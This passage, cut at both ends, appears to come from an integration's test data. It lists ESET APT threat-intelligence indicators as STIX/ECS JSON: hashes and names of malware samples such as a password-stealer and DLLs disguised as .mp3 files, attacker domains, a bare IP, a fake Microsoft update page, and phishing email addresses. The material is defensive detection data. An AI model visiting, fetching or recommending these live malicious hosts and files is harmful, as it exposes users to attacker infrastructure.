'4fcf10a8fe9db80c3eaf172636a602f95b64b0fc' AND file:hashes.SHA256 = '732cfacaafe15f55c177d929eeb4b129dc5a44ce04c8d6d83da236d74c50979f']\", \"pattern_type\": \"stix\", \"pattern_version\": \"2.1\", \"spec_version\": \"indicator\", \"type\": \"indicator\", \"valid_from\": \"2023-09-28T14:40:01Z\"}", + "type": [ + "indicator" + ] + }, + "tags": [ + "preserve_original_event" + ], + "threat": { + "feed": { + "name": "ESET APT stix 2.1" + }, + "indicator": { + "confidence": "High", + "file": { + "hash": { + "md5": "d7519b822434fb89fb3643bc2f450e23", + "sha1": "4fcf10a8fe9db80c3eaf172636a602f95b64b0fc", + "sha256": "732cfacaafe15f55c177d929eeb4b129dc5a44ce04c8d6d83da236d74c50979f" + } + }, + "last_seen": "2023-09-29T09:00:06.000Z", + "modified_at": "2023-09-29T09:00:06.000Z", + "provider": "eset", + "type": "file" + } + } + }, + { + "@timestamp": "2023-09-29T09:00:10.000Z", + "ecs": { + "version": "8.11.0" + }, + "eset": { + "id": "indicator--d37cf6ca-e31f-421f-a7e0-4d1e48ba37d1", + "meta_category": "file", + "name": "file", + "valid_until": "2024-09-28T09:00:10.000Z" + }, + "event": { + "category": [ + "threat" + ], + "kind": "enrichment", + "original": "{\"created\": \"2023-09-29T09:00:10.000Z\", \"created_by_ref\": \"identity--55f6ea5e-51ac-4344-bc8c-4170950d210f\", \"id\": \"indicator--d37cf6ca-e31f-421f-a7e0-4d1e48ba37d1\", \"kill_chain_phases\": [{\"kill_chain_name\": \"misp-category\", \"phase_name\": \"file\"}], \"labels\": [\"misp:name=\\\"file\\\"\", \"misp:meta-category=\\\"file\\\"\", \"misp:to_ids=\\\"True\\\"\"], \"modified\": \"2023-09-29T09:00:10.000Z\", \"pattern\": \"[file:hashes.MD5 = '36b06d73347fe0da8177bd212e2b3f77' AND file:hashes.SHA1 = 'f1fc033763b931a729b9da3eb29a0724fd3eb6b9' AND file:hashes.SHA256 = 'a2f68aacf94a11678abd24039f1a26c65c257c26ac7c31c87b442fbd7f6583d9' AND file:name = 'fghsd.bat']\", \"pattern_type\": \"stix\", \"pattern_version\": \"2.1\", \"spec_version\": \"indicator\", \"type\": \"indicator\", \"valid_from\": \"2023-09-28T19:07:41Z\"}", + "type": [ + "indicator" + ] + }, + "tags": [ + "preserve_original_event" + ], + "threat": { + "feed": { + "name": "ESET APT stix 2.1" + }, + "indicator": { + "confidence": "High", + "file": { + "hash": { + "md5": "36b06d73347fe0da8177bd212e2b3f77", + "sha1": "f1fc033763b931a729b9da3eb29a0724fd3eb6b9", + "sha256": "a2f68aacf94a11678abd24039f1a26c65c257c26ac7c31c87b442fbd7f6583d9" + }, + "name": "fghsd.bat" + }, + "last_seen": "2023-09-29T09:00:10.000Z", + "modified_at": "2023-09-29T09:00:10.000Z", + "provider": "eset", + "type": "file" + } + } + }, + { + "@timestamp": "2023-09-29T08:48:42.000Z", + "ecs": { + "version": "8.11.0" + }, + "eset": { + "id": "indicator--a4cb9aa8-b12e-4141-ae33-509dfd9dd382", + "meta_category": "file", + "name": "file", + "valid_until": "2024-09-28T08:48:42.000Z" + }, + "event": { + "category": [ + "threat" + ], + "kind": "enrichment", + "original": "{\"created\": \"2023-09-29T08:48:42.000Z\", \"created_by_ref\": \"identity--55f6ea5e-51ac-4344-bc8c-4170950d210f\", \"id\": \"indicator--a4cb9aa8-b12e-4141-ae33-509dfd9dd382\", \"kill_chain_phases\": [{\"kill_chain_name\": \"misp-category\", \"phase_name\": \"file\"}], \"labels\": [\"misp:name=\\\"file\\\"\", \"misp:meta-category=\\\"file\\\"\", \"misp:to_ids=\\\"True\\\"\"], \"modified\": \"2023-09-29T08:48:42.000Z\", \"pattern\": \"[file:hashes.MD5 = '7196b26572d2c357a17599b9a0d71d33' AND file:hashes.SHA1 = 'a3ee3d4bc8057cfde073a7acf3232cfb3cbb10c0' AND file:hashes.SHA256 = '6c9eab41d2e06702313ee6513a8b98adc083ee7bcd2c85821a8a3136c20d687e' AND file:name = 'KihqQGHs7zYOxqqNE0b9zO4w6d7ysXUWrfDf6vLOAW4MU3Fs.mp3' AND file:parent_directory_ref.path = 'Comchit ltr no 4200 dt 23-09-2023' AND file:x_misp_fullpath = 'Comchit ltr no 4200 dt 23-09-2023/KihqQGHs7zYOxqqNE0b9zO4w6d7ysXUWrfDf6vLOAW4MU3Fs.mp3' AND file:extensions.'windows-pebinary-ext'.imphash = 'fcab131627362db5898b1bcc15d7fd72' AND file:extensions.'windows-pebinary-ext'.pe_type = 'dll' AND file:extensions.'windows-pebinary-ext'.x_misp_compilation_timestamp = '2023-09-25 07:03:56+00:00' AND file:extensions.'windows-pebinary-ext'.x_misp_authentihash = '6c744b262dbf76fb20346a93cbedbb0668c90b5bb5027485109e3cfb41f48d8c']\", \"pattern_type\": \"stix\", \"pattern_version\": \"2.1\", \"spec_version\": \"indicator\", \"type\": \"indicator\", \"valid_from\": \"2023-09-26T07:00:04Z\"}", + "type": [ + "indicator" + ] + }, + "tags": [ + "preserve_original_event" + ], + "threat": { + "feed": { + "name": "ESET APT stix 2.1" + }, + "indicator": { + "confidence": "High", + "file": { + "hash": { + "md5": "7196b26572d2c357a17599b9a0d71d33", + "sha1": "a3ee3d4bc8057cfde073a7acf3232cfb3cbb10c0", + "sha256": "6c9eab41d2e06702313ee6513a8b98adc083ee7bcd2c85821a8a3136c20d687e" + }, + "name": "KihqQGHs7zYOxqqNE0b9zO4w6d7ysXUWrfDf6vLOAW4MU3Fs.mp3" + }, + "last_seen": "2023-09-29T08:48:42.000Z", + "modified_at": "2023-09-29T08:48:42.000Z", + "provider": "eset", + "type": "file" + } + } + }, + { + "@timestamp": "2023-09-29T08:48:47.000Z", + "ecs": { + "version": "8.11.0" + }, + "eset": { + "id": "indicator--f43fd42c-52d6-432e-a540-71cdc0f46cd9", + "meta_category": "file", + "name": "file", + "valid_until": "2024-09-28T08:48:47.000Z" + }, + "event": { + "category": [ + "threat" + ], + "kind": "enrichment", + "original": "{\"created\": \"2023-09-29T08:48:47.000Z\", \"created_by_ref\": \"identity--55f6ea5e-51ac-4344-bc8c-4170950d210f\", \"id\": \"indicator--f43fd42c-52d6-432e-a540-71cdc0f46cd9\", \"kill_chain_phases\": [{\"kill_chain_name\": \"misp-category\", \"phase_name\": \"file\"}], \"labels\": [\"misp:name=\\\"file\\\"\", \"misp:meta-category=\\\"file\\\"\", \"misp:to_ids=\\\"True\\\"\"], \"modified\": \"2023-09-29T08:48:47.000Z\", \"pattern\": \"[file:hashes.MD5 = 'b8ef6fbfda87b44d969f338b958b2257' AND file:hashes.SHA1 = 'a85c7e14848013efb20469b35e8b70f1e447d54f' AND file:hashes.SHA256 = '354657aa58efe1da26989ef4182916cce77b0367d3a136f2b53b23edf239ff14' AND file:name = 'kafil.exe' AND file:extensions.'windows-pebinary-ext'.imphash = 'd6fe0b6872f80fca2efdb7ab10124297' AND file:extensions.'windows-pebinary-ext'.pe_type = 'exe' AND file:extensions.'windows-pebinary-ext'.x_misp_compilation_timestamp = '2023-09-18 05:12:45+00:00' AND file:extensions.'windows-pebinary-ext'.x_misp_authentihash = '1533427735186cdf43ffb09e53cfe0072393c3651791301e6723957100d481e3']\", \"pattern_type\": \"stix\", \"pattern_version\": \"2.1\", \"spec_version\": \"indicator\", \"type\": \"indicator\", \"valid_from\": \"2023-09-19T12:07:09Z\"}", + "type": [ + "indicator" + ] + }, + "tags": [ + "preserve_original_event" + ], + "threat": { + "feed": { + "name": "ESET APT stix 2.1" + }, + "indicator": { + "confidence": "High", + "file": { + "hash": { + "md5": "b8ef6fbfda87b44d969f338b958b2257", + "sha1": "a85c7e14848013efb20469b35e8b70f1e447d54f", + "sha256": "354657aa58efe1da26989ef4182916cce77b0367d3a136f2b53b23edf239ff14" + }, + "name": "kafil.exe" + }, + "last_seen": "2023-09-29T08:48:47.000Z", + "modified_at": "2023-09-29T08:48:47.000Z", + "provider": "eset", + "type": "file" + } + } + }, + { + "@timestamp": "2023-09-29T08:48:51.000Z", + "ecs": { + "version": "8.11.0" + }, + "eset": { + "id": "indicator--e35b97a0-a1a2-4362-bcb5-6ba7923be65a", + "meta_category": "file", + "name": "file", + "valid_until": "2024-09-28T08:48:51.000Z" + }, + "event": { + "category": [ + "threat" + ], + "kind": "enrichment", + "original": "{\"created\": \"2023-09-29T08:48:51.000Z\", \"created_by_ref\": \"identity--55f6ea5e-51ac-4344-bc8c-4170950d210f\", \"id\": \"indicator--e35b97a0-a1a2-4362-bcb5-6ba7923be65a\", \"kill_chain_phases\": [{\"kill_chain_name\": \"misp-category\", \"phase_name\": \"file\"}], \"labels\": [\"misp:name=\\\"file\\\"\", \"misp:meta-category=\\\"file\\\"\", \"misp:to_ids=\\\"True\\\"\"], \"modified\": \"2023-09-29T08:48:51.000Z\", \"pattern\": \"[file:hashes.MD5 = '2995a24f6bb7eef7824a5e309fbb3443' AND file:hashes.SHA1 = 'bd1dc1b52d55c6b236b1c768353666be962109a6' AND file:hashes.SHA256 = '5043d5af8b887cd73cbd016844514b945c31131714cf662c03ae8f229ef92981' AND file:name = 'Zx6evXzwVZxif146HetzZpkV3K2ODDl6WymohacBjaPqyq2Z.mp3' AND file:parent_directory_ref.path = 'Letter Outward No 1514' AND file:x_misp_fullpath = 'Letter Outward No 1514/Zx6evXzwVZxif146HetzZpkV3K2ODDl6WymohacBjaPqyq2Z.mp3' AND file:extensions.'windows-pebinary-ext'.imphash = 'fcab131627362db5898b1bcc15d7fd72' AND file:extensions.'windows-pebinary-ext'.pe_type = 'dll' AND file:extensions.'windows-pebinary-ext'.x_misp_compilation_timestamp = '2023-09-11 07:50:16+00:00' AND file:extensions.'windows-pebinary-ext'.x_misp_authentihash = '01a392201f4c58b1fc3630669ed269df858ec78a6fe1050fb24d32b1b33bd58c']\", \"pattern_type\": \"stix\", \"pattern_version\": \"2.1\", \"spec_version\": \"indicator\", \"type\": \"indicator\", \"valid_from\": \"2023-09-14T11:39:37Z\"}", + "type": [ + "indicator" + ] + }, + "tags": [ + "preserve_original_event" + ], + "threat": { + "feed": { + "name": "ESET APT stix 2.1" + }, + "indicator": { + "confidence": "High", + "file": { + "hash": { + "md5": "2995a24f6bb7eef7824a5e309fbb3443", + "sha1": "bd1dc1b52d55c6b236b1c768353666be962109a6", + "sha256": "5043d5af8b887cd73cbd016844514b945c31131714cf662c03ae8f229ef92981" + }, + "name": "Zx6evXzwVZxif146HetzZpkV3K2ODDl6WymohacBjaPqyq2Z.mp3" + }, + "last_seen": "2023-09-29T08:48:51.000Z", + "modified_at": "2023-09-29T08:48:51.000Z", + "provider": "eset", + "type": "file" + } + } + }, + { + "@timestamp": "2023-09-29T08:59:10.000Z", + "ecs": { + "version": "8.11.0" + }, + "eset": { + "id": "indicator--9ddd947c-bd18-479f-a8c1-2cb9e6b94f59", + "meta_category": "file", + "name": "file", + "valid_until": "2024-09-28T08:59:10.000Z" + }, + "event": { + "category": [ + "threat" + ], + "kind": "enrichment", + "original": "{\"created\": \"2023-09-29T08:59:10.000Z\", \"created_by_ref\": \"identity--55f6ea5e-51ac-4344-bc8c-4170950d210f\", \"id\": \"indicator--9ddd947c-bd18-479f-a8c1-2cb9e6b94f59\", \"kill_chain_phases\": [{\"kill_chain_name\": \"misp-category\", \"phase_name\": \"file\"}], \"labels\": [\"misp:name=\\\"file\\\"\", \"misp:meta-category=\\\"file\\\"\", \"misp:to_ids=\\\"True\\\"\"], \"modified\": \"2023-09-29T08:59:10.000Z\", \"pattern\": \"[file:hashes.MD5 = '7c3c16981350845838d6f69f50568434' AND file:hashes.SHA1 = 'afcc824bd83676badd5712dbfac1c61468480d54' AND file:hashes.SHA256 = '1a27ffd32ba6f4d08a95105be3f2caee6245fe427e0b534e07f446881296b99e' AND file:name = 'as.dll' AND file:extensions.'windows-pebinary-ext'.imphash = '7e40594946c0c9f8153242b822cd655e' AND file:extensions.'windows-pebinary-ext'.pe_type = 'dll' AND file:extensions.'windows-pebinary-ext'.x_misp_compilation_timestamp = '2023-09-25 06:59:18+00:00' AND file:extensions.'windows-pebinary-ext'.x_misp_authentihash = '2b01fca027096cda8ed7f168621a9ee485eef04cf7e9099590d97e798d1e165a']\", \"pattern_type\": \"stix\", \"pattern_version\": \"2.1\", \"spec_version\": \"indicator\", \"type\": \"indicator\", \"valid_from\": \"2023-09-25T08:02:07Z\"}", + "type": [ + "indicator" + ] + }, + "tags": [ + "preserve_original_event" + ], + "threat": { + "feed": { + "name": "ESET APT stix 2.1" + }, + "indicator": { + "confidence": "High", + "file": { + "hash": { + "md5": "7c3c16981350845838d6f69f50568434", + "sha1": "afcc824bd83676badd5712dbfac1c61468480d54", + "sha256": "1a27ffd32ba6f4d08a95105be3f2caee6245fe427e0b534e07f446881296b99e" + }, + "name": "as.dll" + }, + "last_seen": "2023-09-29T08:59:10.000Z", + "modified_at": "2023-09-29T08:59:10.000Z", + "provider": "eset", + "type": "file" + } + } + }, + { + "@timestamp": "2023-09-29T08:59:50.000Z", + "ecs": { + "version": "8.11.0" + }, + "eset": { + "id": "indicator--5bfb70d8-69b0-49a8-aaf5-3fcd9a59b41a", + "meta_category": "file", + "name": "file", + "valid_until": "2024-09-28T08:59:50.000Z" + }, + "event": { + "category": [ + "threat" + ], + "kind": "enrichment", + "original": "{\"created\": \"2023-09-29T08:59:50.000Z\", \"created_by_ref\": \"identity--55f6ea5e-51ac-4344-bc8c-4170950d210f\", \"id\": \"indicator--5bfb70d8-69b0-49a8-aaf5-3fcd9a59b41a\", \"kill_chain_phases\": [{\"kill_chain_name\": \"misp-category\", \"phase_name\": \"file\"}], \"labels\": [\"misp:name=\\\"file\\\"\", \"misp:meta-category=\\\"file\\\"\", \"misp:to_ids=\\\"True\\\"\"], \"modified\": \"2023-09-29T08:59:50.000Z\", \"pattern\": \"[file:hashes.MD5 = 'f4671beb11a28846a53f81ac1ba333e4' AND file:hashes.SHA1 = '3c4efa52fcfa42f0dccaee70cec7462811fb7b06' AND file:hashes.SHA256 = 'e130d70679e8ac82383d7a2d2e0faaf799d394a39c4df87f955f5da590fd6605' AND file:name = 'PassCat.exe' AND file:extensions.'windows-pebinary-ext'.imphash = '9dab9f23fae6ad65306a199dde7e7b03' AND file:extensions.'windows-pebinary-ext'.pe_type = 'exe' AND file:extensions.'windows-pebinary-ext'.x_misp_compilation_timestamp = '2023-09-05 11:47:35+00:00' AND file:extensions.'windows-pebinary-ext'.x_misp_authentihash = 'f12714cb47ff720487d41c8edb874ddf9ccffc5baa9b36d6d54bb6ea8b70e5d4']\", \"pattern_type\": \"stix\", \"pattern_version\": \"2.1\", \"spec_version\": \"indicator\", \"type\": \"indicator\", \"valid_from\": \"2023-09-07T09:01:06Z\"}", + "type": [ + "indicator" + ] + }, + "tags": [ + "preserve_original_event" + ], + "threat": { + "feed": { + "name": "ESET APT stix 2.1" + }, + "indicator": { + "confidence": "High", + "file": { + "hash": { + "md5": "f4671beb11a28846a53f81ac1ba333e4", + "sha1": "3c4efa52fcfa42f0dccaee70cec7462811fb7b06", + "sha256": "e130d70679e8ac82383d7a2d2e0faaf799d394a39c4df87f955f5da590fd6605" + }, + "name": "PassCat.exe" + }, + "last_seen": "2023-09-29T08:59:50.000Z", + "modified_at": "2023-09-29T08:59:50.000Z", + "provider": "eset", + "type": "file" + } + } + }, + { + "@timestamp": "2023-10-03T13:20:09.000Z", + "ecs": { + "version": "8.11.0" + }, + "eset": { + "id": "indicator--c2d3ca78-8832-4f2c-a770-59184731baf5", + "meta_category": "network", + "name": "domain-ip", + "valid_until": "2024-10-02T13:20:09.000Z" + }, + "event": { + "category": [ + "threat" + ], + "kind": "enrichment", + "original": "{\"created\": \"2023-10-03T13:20:09.000Z\", \"created_by_ref\": \"identity--55f6ea5e-51ac-4344-bc8c-4170950d210f\", \"id\": \"indicator--c2d3ca78-8832-4f2c-a770-59184731baf5\", \"kill_chain_phases\": [{\"kill_chain_name\": \"misp-category\", \"phase_name\": \"network\"}], \"labels\": [\"misp:name=\\\"domain-ip\\\"\", \"misp:meta-category=\\\"network\\\"\", \"misp:to_ids=\\\"True\\\"\"], \"modified\": \"2023-10-03T13:20:09.000Z\", \"pattern\": \"[domain-name:value = 'anguisbi.ru']\", \"pattern_type\": \"stix\", \"pattern_version\": \"2.1\", \"spec_version\": \"indicator\", \"type\": \"indicator\", \"valid_from\": \"2023-09-07T06:13:58Z\"}", + "type": [ + "indicator" + ] + }, + "tags": [ + "preserve_original_event" + ], + "threat": { + "feed": { + "name": "ESET APT stix 2.1" + }, + "indicator": { + "confidence": "High", + "last_seen": "2023-10-03T13:20:09.000Z", + "modified_at": "2023-10-03T13:20:09.000Z", + "provider": "eset", + "type": "domain-name", + "url": { + "original": "anguisbi.ru" + } + } + } + }, + { + "@timestamp": "2023-10-03T13:20:52.000Z", + "ecs": { + "version": "8.11.0" + }, + "eset": { + "id": "indicator--fd162f17-3d98-4129-9574-06ecdf733f6f", + "meta_category": "network", + "name": "url", + "valid_until": "2024-10-02T13:20:52.000Z" + }, + "event": { + "category": [ + "threat" + ], + "kind": "enrichment", + "original": "{\"created\": \"2023-10-03T13:20:52.000Z\", \"created_by_ref\": \"identity--55f6ea5e-51ac-4344-bc8c-4170950d210f\", \"id\": \"indicator--fd162f17-3d98-4129-9574-06ecdf733f6f\", \"kill_chain_phases\": [{\"kill_chain_name\": \"misp-category\", \"phase_name\": \"network\"}], \"labels\": [\"misp:name=\\\"url\\\"\", \"misp:meta-category=\\\"network\\\"\", \"misp:to_ids=\\\"True\\\"\"], \"modified\": \"2023-10-03T13:20:52.000Z\", \"pattern\": \"[url:value = 'http://134.209.223.199' AND url:x_misp_scheme = 'http' AND url:x_misp_port = '80']\", \"pattern_type\": \"stix\", \"pattern_version\": \"2.1\", \"spec_version\": \"indicator\", \"type\": \"indicator\", \"valid_from\": \"2023-09-08T06:31:14Z\"}", + "type": [ + "indicator" + ] + }, + "tags": [ + "preserve_original_event" + ], + "threat": { + "feed": { + "name": "ESET APT stix 2.1" + }, + "indicator": { + "confidence": "High", + "last_seen": "2023-10-03T13:20:52.000Z", + "modified_at": "2023-10-03T13:20:52.000Z", + "provider": "eset", + "type": "url", + "url": { + "original": "http://134.209.223.199", + "port": 80, + "scheme": "http" + } + } + } + }, + { + "@timestamp": "2023-10-03T11:49:09.000Z", + "ecs": { + "version": "8.11.0" + }, + "eset": { + "id": "indicator--cdc79d14-87bc-4011-b371-55fef054e1bd", + "meta_category": "file", + "name": "file", + "valid_until": "2024-10-02T11:49:09.000Z" + }, + "event": { + "category": [ + "threat" + ], + "kind": "enrichment", + "original": "{\"created\": \"2023-10-03T11:49:09.000Z\", \"created_by_ref\": \"identity--55f6ea5e-51ac-4344-bc8c-4170950d210f\", \"id\": \"indicator--cdc79d14-87bc-4011-b371-55fef054e1bd\", \"kill_chain_phases\": [{\"kill_chain_name\": \"misp-category\", \"phase_name\": \"file\"}], \"labels\": [\"misp:name=\\\"file\\\"\", \"misp:meta-category=\\\"file\\\"\", \"misp:to_ids=\\\"True\\\"\"], \"modified\": \"2023-10-03T11:49:09.000Z\", \"pattern\": \"[file:hashes.MD5 = '376002acdf350488c4a3cb5c75e8bbf1' AND file:hashes.SHA1 = '654f86929a79700157f1ea10db4abe2d3e2be4e9' AND file:hashes.SHA256 = '460ebe2c3f45cac68a485f80cf3d33e08301df0e7d0f17fe3943debe512a0583' AND file:extensions.'windows-pebinary-ext'.imphash = '318afb7c57acecbbf5ad0df6b8baf133' AND file:extensions.'windows-pebinary-ext'.pe_type = 'exe' AND file:extensions.'windows-pebinary-ext'.x_misp_compilation_timestamp = '2010-11-08 12:27:29+00:00' AND file:extensions.'windows-pebinary-ext'.x_misp_authentihash = 'dbb3f575e62986974e9e20cbe57226f73f630fb59d547b99d37ca0bcc247d33b' AND file:extensions.'windows-pebinary-ext'.x_misp_company_name = 'Oleg N. Scherbakov' AND file:extensions.'windows-pebinary-ext'.x_misp_file_description = '7z Setup SFX (x86)' AND file:extensions.'windows-pebinary-ext'.x_misp_file_version = '1.5.0.1929' AND file:extensions.'windows-pebinary-ext'.x_misp_legal_copyright = 'Copyright \\u00a9 2005-2010 Oleg N. Scherbakov' AND file:extensions.'windows-pebinary-ext'.x_misp_product_name = '7-Zip SFX' AND file:extensions.'windows-pebinary-ext'.x_misp_product_version = '1.5.0.1929' AND file:extensions.'windows-pebinary-ext'.x_misp_original_filename = '7ZSfxMod_x86.exe' AND file:extensions.'windows-pebinary-ext'.x_misp_internal_filename = '7ZSfxMod' AND file:extensions.'windows-pebinary-ext'.x_misp_lang_id = '000004b0']\", \"pattern_type\": \"stix\", \"pattern_version\": \"2.1\", \"spec_version\": \"indicator\", \"type\": \"indicator\", \"valid_from\": \"2023-09-27T05:34:03Z\"}", + "type": [ + "indicator" + ] + }, + "tags": [ + "preserve_original_event" + ], + "threat": { + "feed": { + "name": "ESET APT stix 2.1" + }, + "indicator": { + "confidence": "High", + "file": { + "hash": { + "md5": "376002acdf350488c4a3cb5c75e8bbf1", + "sha1": "654f86929a79700157f1ea10db4abe2d3e2be4e9", + "sha256": "460ebe2c3f45cac68a485f80cf3d33e08301df0e7d0f17fe3943debe512a0583" + } + }, + "last_seen": "2023-10-03T11:49:09.000Z", + "modified_at": "2023-10-03T11:49:09.000Z", + "provider": "eset", + "type": "file" + } + } + }, + { + "@timestamp": "2023-09-29T19:44:05.000Z", + "ecs": { + "version": "8.11.0" + }, + "eset": { + "category": "Network activity", + "id": "indicator--8ea4a915-b7d5-448c-91f9-1f328102f800", + "type": "email-dst", + "valid_until": "2024-09-28T19:44:05.000Z" + }, + "event": { + "category": [ + "threat" + ], + "kind": "enrichment", + "original": "{\"created\": \"2023-09-29T19:44:05.000Z\", \"created_by_ref\": \"identity--55f6ea5e-51ac-4344-bc8c-4170950d210f\", \"id\": \"indicator--8ea4a915-b7d5-448c-91f9-1f328102f800\", \"kill_chain_phases\": [{\"kill_chain_name\": \"misp-category\", \"phase_name\": \"Network activity\"}], \"labels\": [\"misp:type=\\\"email-dst\\\"\", \"misp:category=\\\"Network activity\\\"\", \"misp:to_ids=\\\"True\\\"\"], \"modified\": \"2023-09-29T19:44:05.000Z\", \"pattern\": \"[email-message:to_refs[*].value = 'joannburke1987@portugalmail.pt']\", \"pattern_type\": \"stix\", \"pattern_version\": \"2.1\", \"spec_version\": \"indicator\", \"type\": \"indicator\", \"valid_from\": \"2023-09-29T19:44:05Z\"}", + "type": [ + "indicator" + ] + }, + "tags": [ + "preserve_original_event" + ], + "threat": { + "feed": { + "name": "ESET APT stix 2.1" + }, + "indicator": { + "confidence": "High", + "last_seen": "2023-09-29T19:44:05.000Z", + "modified_at": "2023-09-29T19:44:05.000Z", + "provider": "eset", + "type": "email-addr" + } + } + }, + null, + { + "@timestamp": "2023-10-02T07:41:04.000Z", + "ecs": { + "version": "8.11.0" + }, + "eset": { + "id": "indicator--d9a10671-eb84-4039-8211-277c14104b39", + "meta_category": "network", + "name": "url", + "valid_until": "2024-10-01T07:41:04.000Z" + }, + "event": { + "category": [ + "threat" + ], + "kind": "enrichment", + "original": "{\"created\": \"2023-10-02T07:41:04.000Z\", \"created_by_ref\": \"identity--55f6ea5e-51ac-4344-bc8c-4170950d210f\", \"id\": \"indicator--d9a10671-eb84-4039-8211-277c14104b39\", \"kill_chain_phases\": [{\"kill_chain_name\": \"misp-category\", \"phase_name\": \"network\"}], \"labels\": [\"misp:name=\\\"url\\\"\", \"misp:meta-category=\\\"network\\\"\", \"misp:to_ids=\\\"True\\\"\"], \"modified\": \"2023-10-02T07:41:04.000Z\", \"pattern\": \"[url:value = 'https://microsoft-update-com.github.io/kb5021042/' AND url:x_misp_scheme = 'https' AND url:x_misp_resource_path = '/kb5021042/' AND url:x_misp_port = '443']\", \"pattern_type\": \"stix\", \"pattern_version\": \"2.1\", \"spec_version\": \"indicator\", \"type\": \"indicator\", \"valid_from\": \"2023-09-28T00:00:00Z\"}", + "type": [ + "indicator" + ] + }, + "tags": [ + "preserve_original_event" + ], + "threat": { + "feed": { + "name": "ESET APT stix 2.1" + }, + "indicator": { + "confidence": "High", + "last_seen": "2023-10-02T07:41:04.000Z", + "modified_at": "2023-10-02T07:41:04.000Z", + "provider": "eset", + "type": "url", + "url": { + "original": "https://microsoft-update-com.github.io/kb5021042/", + "path": "/kb5021042/", + "port": 443, + "scheme": "https" + } + } + } + }, + { + "@timestamp": "2023-10-02T07:58:05.000Z", + "ecs": { + "version": "8.11.0" + }, + "eset": { + "id": "indicator--696f64c3-733b-4cba-8757-e0cb99142ffa", + "meta_category": "network", + "name": "email", + "valid_until": "2024-10-01T07:58:05.000Z" + }, + "event": { + "category": [ + "threat" + ], + "kind": "enrichment", + "original": "{\"created\": \"2023-10-02T07:58:05.000Z\", \"created_by_ref\": \"identity--55f6ea5e-51ac-4344-bc8c-4170950d210f\", \"id\": \"indicator--696f64c3-733b-4cba-8757-e0cb99142ffa\", \"kill_chain_phases\": [{\"kill_chain_name\": \"misp-category\", \"phase_name\": \"network\"}], \"labels\": [\"misp:name=\\\"email\\\"\", \"misp:meta-category=\\\"network\\\"\", \"misp:to_ids=\\\"True\\\"\"], \"modified\": \"2023-10-02T07:58:05.000Z\", \"pattern\": \"[email-message:x_misp_return_path = 'rosalawson1960@portugalmail.pt']\", \"pattern_type\": \"stix\", \"pattern_version\": \"2.1\", \"spec_version\": \"indicator\", \"type\": \"indicator\", \"valid_from\": \"2023-10-02T07:58:05Z\"}", + "type": [ + "indicator" + ] + }, + "tags": [ + "preserve_original_event" + ], + "threat": { + "feed": { + "name": "ESET APT stix 2.1" + }, + "indicator": { + "confidence": "High", + "last_seen": "2023-10-02T07:58:05.000Z", + "modified_at": "2023-10-02T07:58:05.000Z", + "provider": "eset", + "type": "email-addr" + } + } + }, + { + "@timestamp": "2023-10-03T08:15:57.000Z", + "ecs": { + "version": "8.11.0" + }, + "eset": { + "id": "indicator--a444021f-5c0a-4b59-a7af-c451edf05c2f", + "meta_category": "file", + "name": "file", + "valid_until": "2024-10-02T08:15:57.000Z" + }, + "event": { + "category": [ + "threat" + ], + "kind": "enrichment", + "original": "{\"created\": \"2023-10-03T08:15:57.000Z\", \"created_by_ref\": \"identity--55f6ea5e-51ac-4344-bc8c-4170950d210f\", \"id\": \"indicator--a444021f-5c0a-4b59-a7af-c451edf05c2f\", \"kill_chain_phases\": [{\"kill_chain_name\": \"misp-category\", \"phase_name\": \"file\"}], \"labels\": [\"misp:name=\\\"file\\\"\", \"misp:meta-category=\\\"file\\\"\", \"misp:to_ids=\\\"True\\\"\"], \"modified\": \"2023-10-03T08:15:57.000Z\", \"pattern\": \"[file:hashes.MD5 = '8a4c807caea1cd9d3552bed916320ee6' AND file:hashes.SHA1 = '5438e26e5f7d819ef4fcd39b84e575f4c452f234' AND file:hashes.SHA256 = '06e9dd33655ebc062a4236f2611403688baf0711b5a02acc45216ae853fad607' AND file:name = 'install-kb-5021042.cmd']\", \"pattern_type\": \"stix\", \"pattern_version\": \"2.1\", \"spec_version\": \"indicator\", \"type\": \"indicator\", \"valid_from\": \"2023-09-29T10:46:00Z\"}", + "type": [ + "indicator" + ] + }, + "tags": [ + "preserve_original_event" + ], + "threat": { + "feed": { + "name": "ESET APT stix 2.1" + }, + "indicator": { + "confidence": "High", + "file": { + "hash": { + "md5": "8a4c807caea1cd9d3552bed916320ee6", + "sha1": "5438e26e5f7d819ef4fcd39b84e575f4c452f234", + "sha256": "06e9dd33655ebc062a4236f2611403688baf0711b5a02acc45216ae853fad607" + }, + "name": "install-kb-5021042.cmd" + }, + "last_seen": "2023-10-03T08:15:57.000Z", + "modified_at": "2023-10-03T08:15:57.000Z", + "provider": "eset", + "type": "file" + } + } + }, + { + "@timestamp": "2023-10-02T13:48:17.000Z", + "ecs": { + "version": "8.11.0" + }, + "eset": { + "id": "indicator--8444ce6b-3c9e-4363-819a-5f64a238bcc7", + "meta_category": "network", + "name": "domain-ip", + "valid_until": "2024-10-01T13:48:17.000Z" + }, + "event": { + "category": [ + "threat" + ], + "kind": "enrichment", + "original": "{\"created\": \"2023-10-02T13:48:17.000Z\", \"created_by_ref\": \"identity--55f6ea5e-51ac-4344-bc8c-4170950d210f\", \"id\": \"indicator--8444ce6b-3c9e-4363-819a-5f64a238bcc7\", \"kill_chain_phases\": [{\"kill_chain_name\": \"misp-category\", \"phase_name\": \"network\"}], \"labels\": [\"misp:name=\\\"domain-ip\\\"\", \"misp:meta-category=\\\"network\\\"\", \"misp:to_ids=\\\"True\\\"\"], \"modified\": \"2023-10-02T13:48:17.000Z\", \"pattern\": \"[domain-name:value = 'billyconsult.com' AND domain-name:value = 'billyconsult.com']\", \"pattern_type\": \"stix\", \"pattern_version\": \"2.1\", \"spec_version\": \"indicator\", \"type\": \"indicator\", \"valid_from\": \"2022-03-26T00:00:00Z\", \"valid_until\": \"2023-09-29T00:00:00Z\"}", + "type": [ + "indicator" + ] + }, + "tags": [ + "preserve_original_event" + ], + "threat": { + "feed": { + "name": "ESET APT stix 2.1" + }, + "indicator": { + "confidence": "High", + "last_seen": "2023-10-02T13:48:17.000Z", + "modified_at": "2023-10-02T13:48:17.000Z", + "provider": "eset", + "type": "domain-name", + "url": { + "original": "billyconsult.com" + } + } + } + }, + { + "@timestamp": "2023-10-02T13:16:00.000Z", + "ecs": { + "version": "8.11.0" + }, + "eset": { + "id": "indicator--6602ac29-0cb3-4da9-b2dc-091b8a01ebfc", + "meta_category": "network", + "name": "url", + "valid_until": "2024-10-01T13:16:00.000Z" + }, + "event": { + "category": [ + "threat" + ], + "kind": "enrichment", + "original": "{\"created\": \"2023-10-02T13:16:00.000Z\", \"created_by_ref\": 